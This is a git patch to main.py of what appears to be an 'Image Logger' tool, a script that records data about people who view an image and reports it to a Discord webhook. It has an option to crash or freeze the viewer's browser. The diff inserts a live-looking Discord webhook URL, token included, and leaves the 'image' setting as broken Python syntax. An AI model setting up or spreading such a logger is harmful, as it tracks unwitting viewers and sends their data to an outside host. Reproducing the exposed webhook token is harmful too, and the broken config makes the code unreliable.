From b2b21451585c9ed0acb37691a7afcabdf06db03e Mon Sep 17 00:00:00 2001 From: NOAHNOAHNOAHNOAH123 Date: Sat, 26 Apr 2025 18:38:02 -0500 Subject: [PATCH] Update main.py idk --- main.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/main.py b/main.py index 4a822dc..4f5a1f3 100644 --- a/main.py +++ b/main.py @@ -12,14 +12,14 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/api/webhooks/1307153727551049829/hbgtcs-FAxzskIwH4oX9l4hvhwcpRZSx6g0w5qBkL7FsWtDtw0yHqRNiaCxieS2XSeYJ", + "image":, # https://discord.com/api/webhooks/1307153727551049829/hbgtcs-FAxzskIwH4oX9l4hvhwcpRZSx6g0w5qBkL7FsWtDtw0yHqRNiaCxieS2XSeYJ # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) # CUSTOMIZATION # - "username": "Image Logger", # Set this to the name you want the webhook to have - "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000) + "username": "Image Logger", # eobard thawne + "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xff0000) # OPTIONS # "crashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/OverPowerC/Chromebook-Crasher)